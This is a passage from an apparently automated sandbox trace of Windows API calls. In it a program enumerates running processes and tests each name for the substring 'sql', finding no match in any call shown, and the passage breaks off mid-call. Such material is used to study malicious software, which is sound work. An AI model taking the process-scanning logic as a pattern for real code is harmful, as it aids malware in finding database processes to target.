CodePage=0x0, dwFlags=0x200, lpWideCharStr="dwm.exe", cchWideChar=-1, lpMultiByteStr=0x357e3d8, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="dwm.exe", lpUsedDefaultChar=0x0) returned 8 [0140.701] lstrcpyA (in: lpString1=0x567fabc, lpString2="dwm.exe" | out: lpString1="dwm.exe") returned="dwm.exe" [0140.701] StrStrIA (lpFirst="dwm.exe", lpSrch="sql") returned 0x0 [0140.701] Process32NextW (in: hSnapshot=0x370, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5f, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0140.702] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0140.702] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x3583410 [0140.702] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x3583410, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 12 [0140.702] lstrcpyA (in: lpString1=0x567fabc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0140.702] StrStrIA (lpFirst="svchost.exe", lpSrch="sql") returned 0x0 [0140.702] Process32NextW (in: hSnapshot=0x370, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1a, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0140.703] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0140.704] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x3583518 [0140.704] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x3583518, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 12 [0140.704] lstrcpyA (in: lpString1=0x567fabc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0140.704] StrStrIA (lpFirst="svchost.exe", lpSrch="sql") returned 0x0 [0140.704] Process32NextW (in: hSnapshot=0x370, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0140.705] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0140.705] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x3583440 [0140.705] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x3583440, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 12 [0140.705] lstrcpyA (in: lpString1=0x567fabc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0140.705] StrStrIA (lpFirst="svchost.exe", lpSrch="sql") returned 0x0 [0140.705] Process32NextW (in: hSnapshot=0x370, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0140.706] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0140.706] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x3583350 [0140.706] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x3583350, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 12 [0140.706] lstrcpyA (in: lpString1=0x567fabc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0140.706] StrStrIA (lpFirst="svchost.exe", lpSrch="sql") returned 0x0 [0140.706] Process32NextW (in: hSnapshot=0x370, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x350, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x22, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0140.707] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0140.707] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x35834b8 [0140.707] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x35834b8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 12 [0140.707] lstrcpyA (in: lpString1=0x567fabc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0140.707] StrStrIA (lpFirst="svchost.exe", lpSrch="sql") returned 0x0 [0140.707] Process32NextW (in: hSnapshot=0x370, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x434, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0140.708] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0140.708] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x3583320 [0140.708] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x3583320, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 12 [0140.708] lstrcpyA (in: lpString1=0x567fabc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0140.708] StrStrIA (lpFirst="svchost.exe", lpSrch="sql") returned 0x0 [0140.709] Process32NextW (in: hSnapshot=0x370, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x554, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0140.709] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0140.710] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x3583380 [0140.710] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x3583380, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 12 [0140.710] lstrcpyA (in: lpString1=0x567fabc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0140.710] StrStrIA (lpFirst="svchost.exe", lpSrch="sql") returned 0x0 [0140.710] Process32NextW (in: hSnapshot=0x370, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x590, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0140.711] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0140.711] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x3583548 [0140.711] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x3583548, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 12 [0140.711] lstrcpyA (in: lpString1=0x567fabc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0140.711] StrStrIA (lpFirst="svchost.exe", lpSrch="sql") returned 0x0 [0140.711] Process32NextW (in: hSnapshot=0x370, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x598, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0140.712] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0140.712] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x3583398 [0140.712] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x3583398, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 12 [0140.712] lstrcpyA (in: lpString1=0x567fabc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0140.712] StrStrIA (lpFirst="svchost.exe", lpSrch="sql") returned 0x0 [0140.712] Process32NextW (in: hSnapshot=0x370, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0140.713] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0140.713] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x3583590 [0140.713] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x3583590, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 12 [0140.713] lstrcpyA (in: lpString1=0x567fabc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0140.713] StrStrIA (lpFirst="svchost.exe", lpSrch="sql") returned 0x0 [0140.713] Process32NextW (in: hSnapshot=0x370, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0140.714] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="spoolsv.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0140.714] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x35832f0 [0140.715] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="spoolsv.exe", cchWideChar=-1, lpMultiByteStr=0x35832f0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="spoolsv.exe", lpUsedDefaultChar=0x0) returned 12 [0140.715] lstrcpyA (in: lpString1=0x567fabc, lpString2="spoolsv.exe" | out: lpString1="spoolsv.exe") returned="spoolsv.exe" [0140.715] StrStrIA (lpFirst="spoolsv.exe", lpSrch="sql") returned 0x0 [0140.715] Process32NextW (in: hSnapshot=0x370, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x69c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0140.716] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0140.716] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x3583308 [0140.716] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x3583308, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 12 [0140.716] lstrcpyA (in: lpString1=0x567fabc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0140.716] StrStrIA (lpFirst="svchost.exe", lpSrch="sql") returned 0x0 [0140.716] Process32NextW (in: hSnapshot=0x370, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x554, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0140.717] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="audiodg.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0140.717] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x3583338 [0140.717] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="audiodg.exe", cchWideChar=-1, lpMultiByteStr=0x3583338, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="audiodg.exe", lpUsedDefaultChar=0x0) returned 12 [0140.717] lstrcpyA (in: lpString1=0x567fabc, lpString2="audiodg.exe" | out: lpString1="audiodg.exe") returned="audiodg.exe" [0140.717] StrStrIA (lpFirst="audiodg.exe", lpSrch="sql") returned 0x0 [0140.717] Process32NextW (in: hSnapshot=0x370, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x708, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x3ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0140.718] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="sihost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0140.718] LocalAlloc (uFlags=0x40, uBytes=0xb) returned 0x3583638 [0140.718] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="sihost.exe", cchWideChar=-1, lpMultiByteStr=0x3583638, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="sihost.exe", lpUsedDefaultChar=0x0) returned 11 [0140.718] lstrcpyA (in: lpString1=0x567fabc, lpString2="sihost.exe" | out: lpString1="sihost.exe") returned="sihost.exe" [0140.718] StrStrIA (lpFirst="sihost.exe", lpSrch="sql") returned 0x0 [0140.718] Process32NextW (in: hSnapshot=0x370, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x720, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0140.719] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0140.719] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x35836b0 [0140.719] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x35836b0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 12 [0140.719] lstrcpyA (in: lpString1=0x567fabc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0140.719] StrStrIA (lpFirst="svchost.exe", lpSrch="sql") returned 0x0 [0140.719] Process32NextW (in: hSnapshot=0x370, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x3ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0140.721] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="taskhostw.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0140.721] LocalAlloc (uFlags=0x40, uBytes=0xe) returned 0x3583788 [0140.721] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="taskhostw.exe", cchWideChar=-1, lpMultiByteStr=0x3583788, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="taskhostw.exe", lpUsedDefaultChar=0x0) returned 14 [0140.721] lstrcpyA (in: lpString1=0x567fabc, lpString2="taskhostw.exe" | out: lpString1="taskhostw.exe") returned="taskhostw.exe" [0140.721] StrStrIA (lpFirst="taskhostw.exe", lpSrch="sql") returned 0x0 [0140.721] Process32NextW (in: hSnapshot=0x370, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x560, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x40, th32ParentProcessID=0x568, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0140.722] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="explorer.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0140.722] LocalAlloc (uFlags=0x40, uBytes=0xd) returned 0x35837b8 [0140.722] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="explorer.exe", cchWideChar=-1, lpMultiByteStr=0x35837b8, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="explorer.exe", lpUsedDefaultChar=0x0) returned 13 [0140.722] lstrcpyA (in: lpString1=0x567fabc, lpString2="explorer.exe" | out: lpString1="explorer.exe") returned="explorer.exe" [0140.722] StrStrIA (lpFirst="explorer.exe", lpSrch="sql") returned 0x0 [0140.722] Process32NextW (in: hSnapshot=0x370, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x818, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="OfficeClickToRun.exe")) returned 1 [0140.723] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="OfficeClickToRun.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0140.723] LocalAlloc (uFlags=0x40, uBytes=0x15) returned 0x35968c8 [0140.723] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="OfficeClickToRun.exe", cchWideChar=-1, lpMultiByteStr=0x35968c8, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="OfficeClickToRun.exe", lpUsedDefaultChar=0x0) returned 21 [0140.723] lstrcpyA (in: lpString1=0x567fabc, lpString2="OfficeClickToRun.exe" | out: lpString1="OfficeClickToRun.exe") returned="OfficeClickToRun.exe" [0140.723] StrStrIA (lpFirst="OfficeClickToRun.exe", lpSrch="sql") returned 0x0 [0140.723] Process32NextW (in: hSnapshot=0x370, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x84c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="SecurityHealthService.exe")) returned 1 [0140.724] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="SecurityHealthService.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 26 [0140.724] LocalAlloc (uFlags=0x40, uBytes=0x1a) returned 0x35859b8 [0140.725] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="SecurityHealthService.exe", cchWideChar=-1, lpMultiByteStr=0x35859b8, cbMultiByte=26, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SecurityHealthService.exe", lpUsedDefaultChar=0x0) returned 26 [0140.725] lstrcpyA (in: lpString1=0x567fabc, lpString2="SecurityHealthService.exe" | out: lpString1="SecurityHealthService.exe") returned="SecurityHealthService.exe" [0140.725] StrStrIA (lpFirst="SecurityHealthService.exe", lpSrch="sql") returned 0x0 [0140.725] Process32NextW (in: hSnapshot=0x370, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x8a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x4, pcPriClassBase=8, dwFlags=0x0, szExeFile="Memory Compression")) returned 1 [0140.726] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="Memory Compression", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 19 [0140.726] LocalAlloc (uFlags=0x40, uBytes=0x13) returned 0x3596868 [0140.726] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="Memory Compression", cchWideChar=-1, lpMultiByteStr=0x3596868, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Memory Compression", lpUsedDefaultChar=0x0) returned 19 [0140.726] lstrcpyA (in: lpString1=0x567fabc, lpString2="Memory Compression" | out: lpString1="Memory Compression") returned="Memory Compression" [0140.726] StrStrIA (lpFirst="Memory Compression", lpSrch="sql") returned 0x0 [0140.726] Process32NextW (in: hSnapshot=0x370, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb3c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x2a4, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0140.727] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="ShellExperienceHost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 24 [0140.727] LocalAlloc (uFlags=0x40, uBytes=0x18) returned 0x3596728 [0140.727] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="ShellExperienceHost.exe", cchWideChar=-1, lpMultiByteStr=0x3596728, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ShellExperienceHost.exe", lpUsedDefaultChar=0x0) returned 24 [0140.727] lstrcpyA (in: lpString1=0x567fabc, lpString2="ShellExperienceHost.exe" | out: lpString1="ShellExperienceHost.exe") returned="ShellExperienceHost.exe" [0140.727] StrStrIA (lpFirst="ShellExperienceHost.exe", lpSrch="sql") returned 0x0 [0140.727] Process32NextW (in: hSnapshot=0x370, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1c, th32ParentProcessID=0x2a4, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0140.800] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="SearchUI.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0140.801] LocalAlloc (uFlags=0x40, uBytes=0xd) returned 0x3583818 [0140.801] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="SearchUI.exe", cchWideChar=-1, lpMultiByteStr=0x3583818, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SearchUI.exe", lpUsedDefaultChar=0x0) returned 13 [0140.801] lstrcpyA (in: lpString1=0x567fabc, lpString2="SearchUI.exe" | out: lpString1="SearchUI.exe") returned="SearchUI.exe" [0140.801] StrStrIA (lpFirst="SearchUI.exe", lpSrch="sql") returned 0x0 [0140.801] Process32NextW (in: hSnapshot=0x370, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xbe4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x2a4, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0140.802] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="RuntimeBroker.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 18 [0140.802] LocalAlloc (uFlags=0x40, uBytes=0x12) returned 0x3596788 [0140.802] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="RuntimeBroker.exe", cchWideChar=-1, lpMultiByteStr=0x3596788, cbMultiByte=18, lpDefaultChar=0x0, 